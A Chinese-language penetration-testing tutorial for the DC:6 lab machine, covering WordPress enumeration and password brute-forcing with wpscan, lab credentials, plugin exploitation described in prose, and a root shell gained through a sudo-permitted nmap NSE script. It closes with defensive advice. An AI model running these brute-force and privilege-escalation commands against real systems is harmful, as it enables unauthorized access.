DC:6 靶机渗透测试教学文档<\/h1>

一、环境信息<\/h2>

攻击机IP<\/strong>: 192.168.44.133<\/li>

靶机IP<\/strong>: 192.168.44.145<\/li> <\/ul>
二、信息收集阶段<\/h2>
1. 主机发现<\/h3>
使用以下两种方法确定靶机IP:<\/p>
# 方法1: nmap扫描<\/span> <\/span><\/span>nmap -sn 192.168.44.0\/24 <\/span><\/span> <\/span><\/span># 方法2: arp-scan扫描<\/span> <\/span><\/span>arp-scan -I eth0 -l <\/span><\/span><\/code><\/pre>2. 端口扫描<\/h3> 发现80端口开放，但需要通过域名访问:<\/p> 修改hosts文件，添加映射:<\/li> <\/ul> 192.168.44.145 wordy <\/code><\/pre> 3. 目录扫描<\/h3> 发现WordPress特有目录，但无其他有用信息。<\/p> 三、前期渗透测试<\/h2> 1. WordPress站点分析<\/h3> 使用wpscan进行用户枚举和密码爆破:<\/li> <\/ul> wpscan --url http:\/\/wordy -eu <\/span><\/span><\/code><\/pre> 初始爆破失败后，通过线索优化字典:<\/li> <\/ul> cat \/usr\/share\/wordlists\/rockyou.txt | grep k01 > password <\/span><\/span>wpscan --url http:\/\/wordy -eu -P password <\/span><\/span><\/code><\/pre>获取凭证<\/strong>: mark\/helpdesk01<\/p> 2. 登录后分析<\/h3> 登录WordPress后台<\/li> 检查可用的攻击面: 无直接插入代码的地方<\/li> 头像上传可能存在白名单过滤<\/li> <\/ul> <\/li> 发现可利用插件: Activity monitor<\/li> <\/ul> 3. 漏洞利用<\/h3> 利用Activity monitor插件漏洞获取初始shell，并尝试反弹shell。<\/p> 四、权限提升<\/h2> 1. 初始提权尝试<\/h3> 检查SUID文件，未发现可利用项<\/li> 遍历家目录发现敏感信息，获取新凭证<\/li> <\/ul> 2. 切换用户<\/h3> 使用发现的凭证切换到jens用户。<\/p> 3. Sudo提权<\/h3> 检查sudo权限:<\/p> sudo -l <\/span><\/span><\/code><\/pre>发现可以使用nmap以root权限运行，利用nmap 7.4版本的提权方法:<\/p> # 创建nmap脚本<\/span> <\/span><\/span>echo 'os.execute("\/bin\/sh")'<\/span> > nse_root.nse <\/span><\/span> <\/span><\/span># 以root权限执行<\/span> <\/span><\/span>sudo -u root nmap --script=<\/span>\/home\/jens\/nse_root.nse <\/span><\/span><\/code><\/pre>五、关键知识点总结<\/h2> 主机发现技术<\/strong>:<\/p> nmap和arp-scan的使用<\/li> 网络扫描的基本方法<\/li> <\/ul> <\/li> WordPress渗透<\/strong>:<\/p> wpscan工具的使用<\/li> 字典优化技巧(grep过滤)<\/li> WordPress插件漏洞利用<\/li> <\/ul> <\/li> 权限提升技术<\/strong>:<\/p> 敏感信息查找技巧<\/li> Sudo权限滥用<\/li> nmap提权方法(7.4版本)<\/li> <\/ul> <\/li> 反弹shell技巧<\/strong>:<\/p> 获取初始访问后的shell稳定性处理<\/li> <\/ul> <\/li> <\/ol> 六、防御建议<\/h2> 针对WordPress<\/strong>:<\/p> 定期更新WordPress核心和插件<\/li> 使用强密码策略<\/li> 限制登录尝试次数<\/li> <\/ul> <\/li> 针对系统安全<\/strong>:<\/p> 定期检查sudo权限配置<\/li> 更新存在提权漏洞的软件(nmap等)<\/li> 限制敏感信息的存储位置和权限<\/li> <\/ul> <\/li> 针对网络配置<\/strong>:<\/p> 实施网络分段<\/li> 监控异常网络活动<\/li> 定期进行安全审计<\/li> <\/ul> <\/li> <\/ol> 本教学文档涵盖了从信息收集到最终提权的完整渗透测试流程，重点突出了关键技术和工具的使用方法。<\/p>